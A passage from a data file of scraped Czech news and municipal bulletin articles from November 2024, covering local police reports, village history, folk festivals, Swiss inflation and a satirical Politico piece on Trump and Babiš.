do útulku motorovým vozidlem a pod vlivem alkoholu . Strážníci totiž při předávání psa a následném ztotožňování ucítili ze ženy alkohol . Dechová zkouška tuto skutečnost potvrdila naměřenou hodnotou 0,42 ‰. Řidička tak z útulku cestovala přímo na obvodní oddělení do Milovic , kam byla přivolanými policisty převezena k podání vysvětlení. Výhružný e-mail dorazil i do našich škol Ani naše školy se nevyhnuly výhružným e-mailům, které zahltily začátkem září drtivou část školských zařízení napříč Českem. Konkrétně 5. 9. v ranních hodinách byla přijata preventivní opatření v Základní škole Bedřicha Hrozného , kde byla provedena kompletní evakuace všech osob a následná prohlídka vnitřních částí budovy, s negativním výsledkem. Sledujte naše webové stránky na adrese www.mplysa.cz, kde najdete další informace. Autor: Vrch. kom. Bc. Luboš Zita, velitel Autor person Luboš Zita</t>
  </si>
  <si>
    <t>20241101_727_3281207665_1edd93ebcf956b07208e.html</t>
  </si>
  <si>
    <t>1edd93ebcf956b07208e</t>
  </si>
  <si>
    <t>MINULOST BRUMOVA</t>
  </si>
  <si>
    <t>MINULOST BRUMOVA Rubrika: TIŠNOVSKO POHLEDEM RODÁKA A PAMĚTNÍKA První písemná zmínka o obci pochází z r. 1390, kdy Brumov patřil větší částí k panství lomnickému, pět poddaných pak ke klášteru tišnovskému. Název obce pochází asi od slova „brum“, které označuje zvuk vydávaný proudem vody potoka Besénku nebo bzučením hmyzu v okolních lesích. Brumov pravděpodobně vznikl v období kolonizace Moravy , kdy se obyvatelé věnovali převážně zemědělství. Obyvatelé Vývoj obce ukazuje následující tabulka: Rok Počet domů Počet obyvatel 1793 26 154 1839 36 231 1869 43 325 1900 53 302 1921 54 290 2021 105 250 2024 114 256 Podle majetku žili v obci: • sedláci, kteří vlastnili více než 15 ha polností, měli větší statky a pár koní (č. 17, č. 18, č. 21), • rolníci měli kolem 10 ha a 1 koně, • malorolníci kolem 3 ha, k potahu používali krávy a živili se ještě jinou prací, • chalupníci (domkáři) měli od obce nebo sedláků pronajatý kus pozemku, • čeledíni a děvečky pracovali u sedláků za byt a stravu, • řemeslníci a živnostníci. Hodně domkářů se živilo tkalcovstvím, v obci byli 2 hospody (č. 19 a 25), 2 obchodníci (č. 20 a 25), 1 trafikant (č. 12), 2 krejčí (č. 12 a 64), tesaři (č. 60, 61), hodně zedníků (č. 1, č. 25, č. 27, č. 36, č. 37, č. 47, č. 48, č. 57), 1 velmi šikovný obuvník („mistr“ Lipovský č. 26) šil a opravoval nejen boty, ale uměl opravit i hodiny a stříhat a holit muže, v dřevodílně (č. 55) se vyráběly různé násady, dřevěné trakaře a kolečka (korbice), které okoval kovář a podkovář (č. 16), kolář (č. 22) zhotovoval selské povozy a koňské sáně, bednář (č. 40) vyráběl dřevěná vědra (putýnky) a škopky, řezníci (č. 5, č. 19, č. 27) prováděli domácí zabijačky. První osobní auta Zetka 18 (dvouválec, výrobek Zbrojovky Brno ) vlastnili Přikryl J. (č. 16), Svoboda J. (č. 20) a Halouzka A. (č. 25). Venkovská obydlí Venkovské domy se stavěly ze dřeva (roubenky) nebo z nepálených cihel (vepřovic), které si svépomocí zhotovovali sami obyvatelé ze žluté hlíny v tzv. „cihelně“ v dolinách, která se nacházela na dnešní hranici okresů Brno -venkov a Blansko . Domy byly z počátku pokryty doškovou střechou (svázaná sláma ze žita), později šindelem a pálenou krytinou z cihelny v Lomnici . Největší místností byla kuchyně (jizba, světnice), kde se vařilo, jedlo i spalo. Ozdobena byla křížkem, obrázky světců a výšivkami z plátna. Dřevěná truhla v rohu místnosti sloužila k ukládání oblečení. Ve spížce a komoře se skladovaly potraviny a jiné věci. Před domem byla malá zahrádka a lavička na odpočinek. U větších stavení byla jedna malá místnost jako „výměnek“ pro hospodyni a hospodáře. K venkovským stavením patřil dvůr, chlévy, stodola, králíkárna, kurník, hnojiště a suchý záchod, který byl sveden do jímky na močůvku. Stravování Jídelníček byl velmi prostý. Nejčastěji se vařila hutná polévka, do které se „drobil“ chléb, dále kaše (bramborová, hrachová, jáhlová), knedlík a zelí, ke kterému se v neděli a ve svátek přidalo i maso z králíků, drůbeže nebo zabijaček. Polévka se jedla k snídani, obědu i večeři. Ve všední dny pekly hospodyně chutné vdolky, na neděli ještě chutnější koláče plněné tvarohem, povidly nebo jablky. K večeři byly nejčastěji různě upravené brambory s mlékem. Na svačiny byl nejčastěji chléb s máslem nebo se sádlem a škvarky. Velké bochníky chleba (pecny) se pekly v domácích pecích obyčejně jednou za 14 dní a sousedé si je vzájemně opláceli. Z mléka se ručními odstředivkami získávala smetana, z ní pak ručními máselnicemi chutné máslo tvarované různými formami k prodeji. Vedle domácího tvarohu si domácnosti vyráběly i chutný sýr a domácí pivo . S podzimem a zimou přicházel čas domácích zabijaček, které se mohly konat jen na zvláštní povolení a muselo se z nich odevzdávat sádlo a kůže (krupon). Proto vesničané často prováděli zabijačky „na černo“. Práce venkovanů Vesničané pracovali od pondělí do soboty. Neděle byla dnem odpočinku spojená s účastí na bohoslužbách, které navštěvovali pěšky v Bedřichově nebo Černovicích. Zemědělství bylo velmi zaostalé, používalo se primitivní nářadí (motyky, srpy, kosy), výnosy byly malé. Při žních se obilí kosilo ručně tzv. hrabicemi. Pokosené obilí odbírala žena a ukládala je do snopů, které se pak svazovaly a stavěly se z nich panáci (9 snopů), mandele (15 snopů) nebo kozlíci (12 snopů). Vyschlé obilí se pak sváželo do kůlny a později mlátilo. Žito se mlátilo cepy, sláma se pak použila do slamníků nebo se řezala a krmil se s ní dobytek. Později se k mlácení používaly mlátičky a ke kosení samovazy. Také sklizeň brambor byla velmi náročná. Rádlem se prooraly řádky, ty se pak speciálními hráběmi prohrabávaly a vyhrabané brambory ručně posbíraly. Do všech prací byly také zapojeny děti. Zvyky a tradice Největším svátkem byly poutě, hody, masopust, Vánoce a Velikonoce, které byly spojeny s velkým úklidem, výzdobou břízkami, pečením koláčů, koblih a cukroví. Na návsi postavili chasníci máj, kterou pak hlídali, aby ji nepodřezali chasníci ze sousedství. Při hodech se četl ortel nad beranem (kozlem), který humornou formou sděloval různé příhody a prohřešky občanů. Jezdec na koni (pardón) nakonec zrušil rozsudek nad nevinným kozlem, a tak jej osvobodil. Pout’ začínala dopolední slavnostní bohoslužbou, kterou doprovázeli muzikanti. Pak byl slavnostní oběd, návštěva pout’ových atrakcí na návsi (kolotoč, houpačky, střelnice), fotbalový zápas svobodní-ženáči a večer taneční zábava na dřevěném parketě postaveném na návsi, kde ve všední dny se pásla hejna hus vesničanů. O Vánocích děti chodily koledovat, o Velikonocích byla pomlázka. V zimě se ženy setkávaly při draní husího peří. Tato setkání byla příležitostí k vykládání nejrůznějších historek a zpěvu lidových písní. Děti s oblibou seděly a pozorně naslouchaly. Nedělní odpoledne trávili muži v místní hospůdce při pivě a hře v karty (mariáš nebo taroky). Živelní pohromy V r. 1882 byly požáry v číslech 17, 27 a 16, za týden vyhořela čísla 35 a 36. 14. 9. 1945 vyhořely 2 zemědělské usedlosti (Zhořovi č. 7 a Mikšovi č. 8). Postižené rodiny se pak odstěhovaly do Kamenné Horky u Svitav na hospodářství po sudetských Němcích. V roce 1922 prudká bouře s průtrží mračen strhla a odnesla všechny mosty od Brumova až k Lomnici . 29. 7. 1929 silný vichr vyvrátil stromy v lesích. V květnu 1935 silné krupobití způsobilo 90% škodu na zemědělských plodinách. V r. 1956 silná větrná smršt’ způsobila značné škody na polích i v lesích, na některých domech odnesla i krytinu. 19. 6. 1986 katastrofální povodeň byla způsobena dvěma bouřkami a krupobitím. Napršelo tehdy 120 litrů na m2 . Z Lískovce se valila více než 0,5 m vysoká voda s kamením, bahnem a kusy dřev. Zatopila domy, dvory a zahrádky. Rozvodněný potok Besének strhal mosty na silnici do Lomnice , kde při záchranných pracích zahynul jeden dobrovolný hasič. Malé zamyšlení na závěr Minulý venkovský život byl provázen tvrdou prací, šetrností a skromností. Rodina byla místem pro lásku, péči a podporu. Lidé si vzájemně pomáhali a řídili se pravdivým příslovím „Komu se nelení, tomu se zelení“. Proto apeluji na dnešní mladou generaci, aby si vážila výsledků tvrdé a namáhavé práce svých rodičů, prarodičů a příbuzných. Naši předchůdci nám mohou být vzorem v pracovitosti, pokoře, šetrnosti, skromnosti, počestnosti a vzájemné lásce. V životě je důležité rozlišit, kdo nás má opravdu rád a kdo nás jen využívá. Život je jako kniha. Některé kapitoly jsou smutné, některé št’astné a veselé, jiné vzrušující. Ale pokud nikdy neotočíš stránku, nikdy se nedozvíš, co bude dále. První automobil v Brumově – ZETKA 18. První traktor se samovazem při žních. Hody v Brumově . Členové SDH Brumov před II. světovou válkou. Foto z kroniky a dobového tisku (zdroj archiv autora) Autor: Alois Halouzka Autor person Alois Halouzka Rubrika transition_slide TIŠNOVSKO</t>
  </si>
  <si>
    <t>20241101_728_3281207667_d32edd25343b90b78d18.html</t>
  </si>
  <si>
    <t>d32edd25343b90b78d18</t>
  </si>
  <si>
    <t>OD ŠITÍ KROJŮ PO TANEČNÍ PARKET</t>
  </si>
  <si>
    <t>OD ŠITÍ KROJŮ PO TANEČNÍ PARKET TIŠNOVSKÉ HODY 2024 Svatováclavské hody každoročně přináší do Tišnova folklor, lidovou hudbu, kroje, tanec a spoustu radosti a veselí. Letošní ročník nebyl výjimkou. Napekli jsme koláčky, oblékli kroje a jako tišnovská krojovaná chasa jsme se opět postarali o to, aby místní i návštěvníci mohli prožít nezapomenutelný víkend. Na večerní zábavu dokonce dorazilo přes sto padesát lidí v krojích! Už teď začínáme chystat vše pro to, aby i následující rok mohly hody proběhnout v plné parádě. Nestačí jen vyprat a vyžehlit kroje. Snažíme se hody každý rok zlepšovat a už jen díky velkému zájmu mladých stárků a přespolních krojovaných je vidět, že se nám to daří. Musíme proto co nejdřív naplánovat, jaké kroje bude potřeba došít. Umí to jen pár lidí v republice. „Hodový víkend s sebou přináší kromě zábavy také spoustu povinností a úkolů,” říká loňská hlavní stárková Adéla Sáblíková. „Napéct koláčky, naškrobit a vyžehlit kroje, vyleštit holiny a demižony naplnit vínem . Patří sem také spousta telefonátů, schůzek, kompromisů, neshod a následných usmíření. Holt bez práce nejsou koláče, a ani hody, během kterých by se ty koláče daly sníst.” Stejně to vnímá i hlavní stárek Tomáš Halouzka, který letos poprvé nahlédl do všech organizačních záležitostí. „Byl to pro mě docela šok, i když jsem na hodech tancoval už několik let,“ přiznává. Na jaře hlavní organizační tým začíná společně s velkou podporou tišnovského MěKS chystat hlavní program. Celé léto pak všichni stárci a stárkové věnují každý nedělní večer nácvikům besedy, dalších tanců a písní. Právě období příprav, kdy se dolaďují poslední detaily a rozdělují úkoly, prověří týmovost a vytrvalost stárků. „Kromě běžných organizačních záležitostí jsme se letos rozhodli přidat další novinku – nacvičili jsme novou československou besedu,” dodává Tomáš. Samotné hody přinesly řadu tradičních momentů, od slavnostního průvodu městem přes vystoupení neuvěřitelně šikovných tišnovských dětí po večerní zábavu v sokolovně. Nechyběly ani vtipné situace, které k těmto akcím neodmyslitelně patří. Hlavní stárek během předání práv na náměstí záměrně „zapomněl“ svou jedinou repliku, čímž navodil veselou atmosféru mezi přihlížejícími. Další kuriózní příhodou byla skupinka stárků, která při zvaní na hody stopovala k hasičům, aby hasiče mohla osobně pozvat na večerní zábavu. Tišnovské hody jsou nejen oslavou tradic, ale také příležitostí pro setkání s přáteli a sousedy. Pro chasu je největší odměnou vidět, jak jejich úsilí přináší radost městu. „Když se s námi lidé na chvíli zastaví, popovídají si, nebo si s námi během hodové zábavy zatančí, je to pro nás ta nejlepší odměna,“ říká Adéla Sáblíková. S příchodem října zůstávají po hodech už jen vzpomínky a mája s blednoucími pentlemi na náměstí. Kroje se ukládají do skříní, boty do botníků a tišnovská chasa už teď začíná plánovat, co přinese příští rok. Zároveň ale vyrážíme i na krojované akce do okolních vesnic, podpořit tradice a utužovat vztahy se stárky z našeho regionu. Nezapomeňte sledovat sociální sítě chasy, kde se včas dozvíte novinky, čeká vás spousta dalších fotek z letošních hodů a příští rok v létě pak samozřejmě i podrobnosti o chystaném programu Svatováclavských hodů 2025. Na Instagramu nás najdete jako @tisnovskachasa. Foto: Matouš Vinš Autor: Adéla Sáblíková, Tomáš Halouzka, Matouš Vinš Autoři person Matouš Vinš person Tomáš Halouzka person Adéla Sáblíková</t>
  </si>
  <si>
    <t>20241101_729_3239759761_7883557d2f17598f0f67.html</t>
  </si>
  <si>
    <t>7883557d2f17598f0f67</t>
  </si>
  <si>
    <t>ŽIVOT MEZI DIMENZEMI (13)</t>
  </si>
  <si>
    <t>ŽIVOT MEZI DIMENZEMI (13) 1 komentář celý seriál sdílet Reklama Nejznámější příběhy, jejichž hlavním tématem je relativita času, jsou samozřejmě příběhy typu „Rip van Winkle“, které vznikly podle četných lidových vyprávění, jež se údajně týkají skutečných událostí. Kupodivu totožný námět najdeme opět v odvěkém čínském folklóru. Svědčí o tom příběh o Wang Čchiovi, jednom ze svatých mužů taoistů. Jednoho dne, když Wang Čchih putoval po horách Kii-čou a sbíral dříví na oheň, uviděl jeskyni, kde několik starců hrálo šachy. Přišel se podívat na jejich hru a položil svou sekeru. Jeden ze starců mu podal něco jako datlový kámen a poručil mu, aby si ho přiložil k ústům. „Sotva to udělal, hlad a žízeň ho přešly.“ A tak se stalo. O nějaký čas později mu jeden ze starých hráčů řekl: „Už je to dlouho, co jsi sem přišel, měl bys jít domů.“ A tak se vrátil domů. Když se však otočil, aby zvedl svou sekeru, Wang Čchi zjistil, že se rukojeť proměnila v prach. Došel do údolí, ale zjistil, že neuplynuly hodiny ani dny, ale staletí, a ze světa, jak ho znal, nezbylo nic. Podobná tradice existuje i v Dánsku . Například v příběhu, který je pro tento vzor typický, šla nevěsta během oslav svého svatebního dne bezmyšlenkovitě po polích a minula mohylu, „kde se skřítci bavili“. ( Opět se zde setkáváme s popisem Skřítků v blízkosti kouzelného předmětu, někdy popisovaného jako velký, plochý, kulatý stůl, jindy jako kopeček. Tomuto popisu by odpovídal disk nebo velký kužel spočívající na zemi. Hartland při popisu pohádkového pahorku píše: „Pahorek stál, jak je při takových příležitostech obvyklé, na červených sloupech!“ ). „Drobní lidé“ nabídli budoucí nevěstě pohár vína a ona se s nimi zapojila do tance. Pak spěchala domů, kde však svou rodinu nenašla. Ve vesnici se všechno změnilo. Nakonec, když uslyšela její křik, zvolala jedna velmi stará žena „Byla jsi to tedy ty, kdo před sto lety zmizel na svatbě bratra mého dědečka?“ Při těchto slovech ubohá dívka padla k zemi a zemřela. Je vskutku fascinující nalézt takové talky, které o staletí př Reklama Autor: web Autor person web Rubrika transition_slide Články</t>
  </si>
  <si>
    <t>2230</t>
  </si>
  <si>
    <t>1680</t>
  </si>
  <si>
    <t>20241101_73_3264641821_bf5e766c1fb9a0b5f85c.html</t>
  </si>
  <si>
    <t>bf5e766c1fb9a0b5f85c</t>
  </si>
  <si>
    <t>Pokud Trump padne, může utéct do Česka, píše Politico. V zemi má prý svůj „klon z Temu“</t>
  </si>
  <si>
    <t>Pokud Trump padne, může utéct do Česka , píše Politico. V zemi má prý svůj „klon z Temu“ „Pokud jen přehlédnete několik menších odlišností – například oranžovou tvář – Česko nabízí svého vlastního obchodního magnáta, který se přeměnil v politického žháře: Andreje Babiše , který se brzy bude ucházet o návrat do vysokého úřadu,“ napsal Politico. V odkazu na Trumpovo volební heslo Make America Great Again (udělat Ameriku znovu skvělou) poznamenal, že Babiš chce zase skvělou učinit Českou republiku . „Před volbami v příštím roce mu preference rostou,“ uvedl. ČTĚTE TAKÉ: Trump chce rozdávat lukrativní posty: Musk má masivně škrtat, Kennedy řešit jídlo a vakcíny Babiše portál označil za velkého příznivce nápadů republikánského střihu, jako jsou radikální přistěhovalecká politika a sliby snížení daní. „Má dokonce červenou kšiltovku s nápisem silné Česko, která připomíná Trumpovy ikonické čepice Make America Great Again,“ vysvětlil server americkým čtenářům. „Stačí mu jen říkat Trump z Temu,“ dodal. Temu je čínský internetový prodejce, který je vyhlášený levnými alternativami dražších výrobků. Temu má ale problémy s kvalitou a bezpečností některých produktů. Krajně pravicové skupině Proud Boys („hrdí hoši“), která stojí za Trumpem, Politico vybral Durynsko na východě Německa . Zdůvodňuje to tím, že zde poprvé od prvního úspěchu ve 30. letech 20. století zvítězila nacistická strana, jak označil Alternativu pro Německo (AfD). „Zastánci nadřazenosti bílé rasy zde rovnou najdou spojence,“ dodal. Trumpově dělnické třídě by se podle Politica mohlo líbit v Maďarsku , které označil za nový průmyslový ráj s automobilkami a továrnami na baterie a s vyspělou čínskou technologií a kapitálem. „Bohužel nemůžete nosit zbraně tak svobodně jako v USA , ale není zde smrtonosnější zbraně než doma pálené pálinky (ovocná pálenka) - díky (Viktoru) Orbánovi osvobozená od daní,“ uvedl server. Demokraté, kteří neuznávají hranice států, mohou po případném Trumpově vítězství zamířit na Baleárské ostrovy ve Středomoří. Vláda španělského premiéra Pedra Sáncheze se totiž vzpírá trendu států Evropské unie zpřísnit přistěhovalectví. „Demokraté toužící po životě s vínem a revolucí a po tom, aby jejich daně přispěly ke štědřejšímu sociálnímu státu, by mohli skončit ve Francii ,“ nabízí Politico s tím, že luxus by zase mohli chtít hledat na jihu na Riviéře. V tomto případě ale portál varuje, že přímořská oblast je střediskem krajní pravice. Jasno má Politico také v tom, kam by se mohli uchýlit anarchističtí flamendři a zelení nadšenci. Pro ty první vidí jako ideál Amsterdam , pro ekology zase Brusel , kde šéfka Evropské komise Ursula von der Leyenová slibuje dekarbonizovat hospodářství. „Jen se musíte připravit každý rok na zhruba osm měsíců nepřetržitého deště,“ dodal o unijní metropoli server. PODÍVEJTE SE: Volby v USA na CNN Prima NEWS . Sledujte vysílání plné analýz i exkluzivní obsah webu</t>
  </si>
  <si>
    <t>20241101_730_3241826893_bebf970833c0384af803.html</t>
  </si>
  <si>
    <t>bebf970833c0384af803</t>
  </si>
  <si>
    <t>Švýcarsko by v&amp;nbsp;příštím roce mohlo sklouznout do deflace. Kontrolu nad cenovou hladinou politikům komplikuje silný frank</t>
  </si>
  <si>
    <t>Švýcarsko by v&amp;nbsp;příštím roce mohlo sklouznout do deflace. Kontrolu nad cenovou hladinou politikům komplikuje silný frank Menu Zavřít Švýcarsko by v příštím roce mohlo sklouznout do deflace. Kontrolu nad cenovou hladinou politikům komplikuje silný frank Doba čtení: 3 minuty Autor: Depositphotos Inflace ve Švýcarsku zpomaluje natolik, že by se dle některých odborníků mohla cenová hladina v příštím roce vydat opačným směrem Hlavním hnacím motorem tohoto jevu je silný frank Švýcarská národní banka ( SNB ) letos třikrát snížila úrokové sazby a upravila své inflační prognózy pro rok 2025 na 0,6 procenta. Podle některých by však tempo růstu cenové hladiny mohlo zpomalit až na 0,1 procenta Analytici spekulují, že by SNB proti deflaci mohla zasáhnout devizovými intervencemi. Jiní silnou měnu za riziko nepovažují Švýcarsko by v příštím roce mohlo čelit deflaci. Výrazně k tomu přitom může přispět silnější frank, který politikům komplikuje snahy korigovat vývoj cen. Informuje o tom web CNBC. Švýcarská národní banka ( SNB ) letos v září snížila úrokové sazby již potřetí za sebou, přičemž jako jeden z klíčových důvodů poklesu inflace uvedla právě sílu této, obecně vzato, bezpečné měny. Kromě ní ale sehrály roli i klesající ceny ropy a elektřiny. Outstream Placeholder Ve světle těchto skutečností změnila centrální banka své odhady průměrné roční inflace pro letošní rok. Původní predikci 1,3 procenta snížila o desetinu procentního bodu. Pomalejší růst cen navíc očekává i v roce 2025. Namísto 1,1procentního zdražování nově počítá s růstem cen o 0,6 procenta. Odcházející předseda SNB Thomas Jordan potvrdil, že silný frank původní odhady skutečně výrazně ovlivnil, riziko deflace však zároveň bagatelizoval s tím, že predikce zůstávají v rámci cenové stability. Švýcarský frank posílil hlavně v posledních měsících a aktuálně se pohybuje poblíž historických maxim. Ve středu se tamní měna obchodovala v kurzu 0,9414 franku za euro, respektive 0,8669 franku za dolar. Čas na devizové intervence? Ve snaze zabránit nežádoucí deflaci je podle analytiků čím dál pravděpodobnější, že SNB zahájí devizové intervence. Ty probíhají tak, že centrální banka na devizovém trhu nakupuje nebo prodává domácí měnu za účelem zvýšení či snížení její hodnoty vůči jiným měnám. To ve finálním důsledku může pomoci kontrolovat cenovou hladinu, zejména v ekonomikách s vysokým podílem zahraničního obchodu. Inflace se v srpnu navzdory odhadu analytiků udržela na 2,2 procenta. Meziměsíčně zdražovaly především alkohol , tabák a potraviny „Existuje určitý prostor pro další snižování úrokových sazeb, ale vzhledem k tomu, že posilování franku může Švýcarsko posunout do deflačního pásma, dávalo by smysl, aby se SNB přímo zaměřila na zhodnocující se měnu prostřednictvím devizových intervencí,“ uvádí pro CNBC Adrian Prettejohn, ekonom pro Evropu ve společnosti Capital Economics. Jen krůček k nule Na rozdíl od většiny hlavních ekonomik, které v posledních letech čelily dvouciferné inflaci, se ve Švýcarsku zdražovalo jen mírně. Svého maxima dosáhl růst cenové hladiny v srpnu 2022 kdy odpovídal 3,5 procenta. Letos v březnu, kdy inflace činila 1,2 procenta, SNB jako první významná západní centrální banka snížila úrokové sazby. V září pak cenová hladina rostla 0,8procentním tempem, což oproti předchozímu roku představovalo pokles o 0,3 procentního bodu. Letos by se prý inflace dle Capital Economics mohla dostat na hodnotu 0,3 procenta, tedy o půl procentního bodu níže, než společnost původně předpovídala. „Očekáváme, že v některých měsících může inflace klesnout až na 0,1 procenta. K nule pak už mnoho nechybí,“ říká Prettejohn s tím, že za něj deflace představuje reálnou možnost. Putin má problém. Inflace v Rusku strmě roste, brambory od začátku roku zdražily téměř dvojnásobně Nicméně, i navzdory její hrozbě není posilování švýcarského franku samo o sobě důvodem k obavám. Alespoň podle ekonoma a investičního ředitele společnosti UBS Global Wealth Management Maxima Botterona. Jako důvod zmiňuje, že tempo, jakým měna aktuálně sílí, je stále pomalejší než v letech 2011 a 2015. „Nejsme v situaci, kdy bychom se měli nadhodnocení švýcarského franku obávat,“ míní, leč na druhou stranu dodává, že mírná inflace v příštím roce určité nebezpečí představuje: „Dokud však nedojde k velmi prudkému zhodnocení, myslím, že riziko deflace, které by opravňovalo k mnohem agresivnějšímu uvolnění měnové politiky, je v této fázi poměrně nepravděpodobné.“ SNB své nejnovější rozhodnutí o měnové politice oznámí 12. prosince. Na její závěry s napětím čekají nejen ekonomové ze země helvétského kříže, nýbrž i v zahraničí. Koho byste jako prezidenta USA upřednostnili? Kamalu Harrisovou Zobraz výsledek Rozhovory Autor: Tereza Tancerová Autor Tereza Tancerová</t>
  </si>
  <si>
    <t>28840</t>
  </si>
  <si>
    <t>39310</t>
  </si>
  <si>
    <t>20241101_731_3298013865_b2335611ec314e878960.html</t>
  </si>
  <si>
    <t>b2335611ec314e878960</t>
  </si>
  <si>
    <t>Přijede svatý Martin na bílém koni</t>
  </si>
  <si>
    <t>Přijede svatý Martin na bílém koni Rubrika: Z organizací Žehnání nového vína se na Masarykově náměstí koná už podevatenácté Uherské Hradiště je městem, v jehož pomyslných žilách pulzuje víno . Svatý Martin na bílém koni každoročně přijíždí do srdce Slovácka , vždy 11. listopadu v 11.11 hodin za zvuku kostelních zvonů, které umocní atmosféru této podzimní, letošnímu vínu zaslíbené akce. Je zvykem, že se svátek svatého Martina slaví vždy přímo v tento magický den, s datem 11. 11. Letošní oslava připadá na pondělí, což podvědomě nabádá k prodlouženému víkendu a kratší podzimní dovolené ještě předtím, než nás pohltí předvánoční shon. Nejdříve přijde na řadu folklorní program a ztvárnění legendy o svatém Martinovi a jeho plášti, na což se všichni každoročně těší, a poté požehnání vínu knězem. Následuje degustace vín od vinařů, kteří pocházejí výhradně z vinařské slovácké oblasti. Můžete ochutnat až 50 vzorků Svatomartinských a mladých vín. Opravdu je tedy z čeho vybírat a na co se těšit. A nezůstanete ani o hladu! Budete moci ochutnat martinské speciality, jako je kachní či husí maso, ať už v moderní, nebo tradiční formě zpracování. Na zobnutí poslouží krajíc chleba s husí paštikou nebo ke kávě svatomartinský rohlíček. No, a aby husa plavala, můžete to spláchnout martinským pivním speciálem. Podrobné informace prosím sledujte na webových stránkách Slovácka pod odkazem www.slovacko.cz/zehnanivina. V pondělí 11. listopadu přesně v 11.11 hodin na Masarykově náměstí si všichni společně vychutnáme letošní vinnou úrodu, svatomartinskou kuchyni plnou specialit i tradičních pokrmů, užijeme si folklorního programu a veselí. Předvánoční čas bude patřit rukodělným výrobkům ze Slovácka V sobotu 23. listopadu se v uherskohradišťské Redutě uskuteční tradiční přehlídka rukodělných výrobků s názvem Přehlídka Slovácko v tradici. Od 9 do 16 hodin budete mít jedinečnou příležitost setkat se s tradičními výrobci ze Slovácka , často nositeli těch nejvyšších ocenění, kteří do svých výrobků vkládají nejen své dovednosti, ale i lásku, a zachovávají tak tradice Slovácka . Nejen, že si budete moci prohlédnout, jak vypadá tradiční řemeslo a výroba, kdo konkrétně stojí za těmito výrobky, ale také se dozvíte, jaká řemesla jsou dodnes na Slovácku uchovávaná. Při této příležitosti se budete tvůrcům dívat přímo pod ruce a některá ze řemesel si můžete sami vyzkoušet. Ochutnáte tradiční dobroty a něco pěkného si můžete odnést domů, třeba jako dárek pro někoho blízkého. Na akci se budou také slavnostně předávat certifikáty novým výrobcům, dále bude probíhat promítání seriálu Poztrácená řemesla a těšit se můžete i na folklorní soubor, cimbálovou muziku a ochutnávku letošních vín. Součástí programu bude také módní přehlídka z dílen tradičních i soudobých tvůrců, kteří z tradice vychází. Nechte se unést předadventní atmosférou, podpořte lokální řemeslníky a odneste si domů kousek Slovácka . Více na www.tradicnivyrobek.cz. Dárky z městského informačního centra, které potěší Ještě před nedávnem sluneční paprsky dopadaly na naše krásné město, ale ani jsme nemrkli, popadalo listí ze stromů a už klepe advent na dveře. Tento čas, kdy se město zahalí do bílého kabátku a vše se zpomalí, je také časem, kdy chceme potěšit své blízké. Obchody možná praskají ve švech nejrůznějšími předměty, avšak pokud hledáte něco originálního, milého a lokálního, pak doporučujeme navštívit Městské informační centrum Uherské Hradiště. Jistě si pamatujete krásné modré a červené vánoční baňky na stromeček. Pro letošní rok s radostí oznamujeme, že od 29. listopadu bude v prodeji nová kolekce. A to v barvách zlatá a červená, stříbrná a modrá. Takovou krásnou baňkou na stromeček uděláte radost každému rodákovi. Mezi další originální dárky pro letošní rok patří například Slovník nářečí obcí regionu Dolní Poolšaví , který udržuje povědomí o místním nářečí a uchovává ho pro další generace. Navíc se jedná o třetí doplněné vydání z oblasti Kunovic , Míkovic , Podolí , Popovic , Sadů (Derfle) a Vések . A jako třešinku na dortu můžeme zmínit, že zde zakoupíte také výborné víno z vinařství Rochúz se speciální etiketou. Potěšte sebe nebo své blízké originálními dárky z Uherského Hradiště . MIC Uherské Hradiště Masarykovo náměstí 21 572 525 525 mic@uherske-hradiste.cz www.uherske-hradiste.cz Autor: -LH- Rubrika transition_slide Z organizací</t>
  </si>
  <si>
    <t>20241101_732_3301980786_b47bff89d252851e97d9.html</t>
  </si>
  <si>
    <t>b47bff89d252851e97d9</t>
  </si>
  <si>
    <t>Listopadové rozjímání</t>
  </si>
  <si>
    <t>Listopadové rozjímání Rubrika: SLOVO MÍSTOSTAROSTY Nadcházející měsíc přináší mnohým klid, příležitost zpomalit a ponořit se do úvah o téměř uplynulém roce. Svátek dušiček, připadající hned na první sobotu v měsíci, je pro většinu rodin příležitostí k zamyšlení, vzpomínce na své blízké, k uctění jejich památky a také k pokornému uvědomění si pomíjivosti času, ale i k ocenění toho, co jsme dosud zažili a co dobrého nás obklopuje. O týden později, v sobotu 9. 11. v 11.00 hodin, přivítáme na zámeckém nádvoří poděbradského zámku svatého Martina , který přijede jako tradičně na bílém koni. Je to sice o dva dny dříve, než nastane to magické datum složené z jedniček a nul, ale jak se on osobně a exkluzivně vyjádřil pro redakci PZ: „Velmi se za to omlouvám, ale toho jedenáctého se to opravdu nedá vše stihnout!“ Oslavy svátku sv. Martina jsou směsicí křesťanských tradic, které oslavují příchod zimy a hojnosti. Většina z nás má tento svátek spojen se svatomartinskou husou, stejnojmenným vínem , prostě s hodováním. Z historie víme, že na svátek svatého Martina hospodáři vypláceli své děvečky a čeledíny a ti podle toho, jaká byla výplata, si prodlužovali své působení u hospodáře, či odcházeli jinam. Oslava výplaty se mnohdy zvrhla a nebývalo neobvyklé, že mnohý prohýřil svou celoroční mzdu. Proto se i jméno Martínek zhusta stalo bezmála nadávkou a bylo spojeno s někým, kdo opilý dělá vylomeniny. Toho se ale občané poděbradští nemusí bát, protože letos posílený sbor městských strážníků je na případné „Martínky“ dobře připraven. Ale teď chvíli vážně. Svatý Martin je svou legendou „rozděleného pláště“ trvalou připomínkou hodnot, které bychom měli mít na paměti v každodenním životě. Je to laskavost, pokora a ochota pomáhat těm, kteří to potřebují. V této symbolice bychom měli hledat pravý smysl oslav, přesahující gastronomické zážitky, a důležitost lidskosti v našich životech. Přeji vám, abyste si vychutnali předposlední měsíc roku v jeho klidné kráse, užívejte si chvilky s rodinou a přáteli a můžete již přemýšlet, jak si letos vytvoříte tu pravou vánoční atmosféru. Tou dobrou inspirací může třeba být adventní program, který pro vás připravilo městské kulturní centrum a najdete ho v příštím čísle Poděbradského zpravodaje. Příjemné listopadové rozjímání! Autor: Ing. Miroslav Holas, 2. místostarosta Autor person Miroslav Holas Rubrika transition_slide SLOVO MÍSTOSTAROSTY</t>
  </si>
  <si>
    <t>20241101_733_3302005145_367572df6725f40958f2.html</t>
  </si>
  <si>
    <t>367572df6725f40958f2</t>
  </si>
  <si>
    <t>Kulturní přehled – listopad 2024</t>
  </si>
  <si>
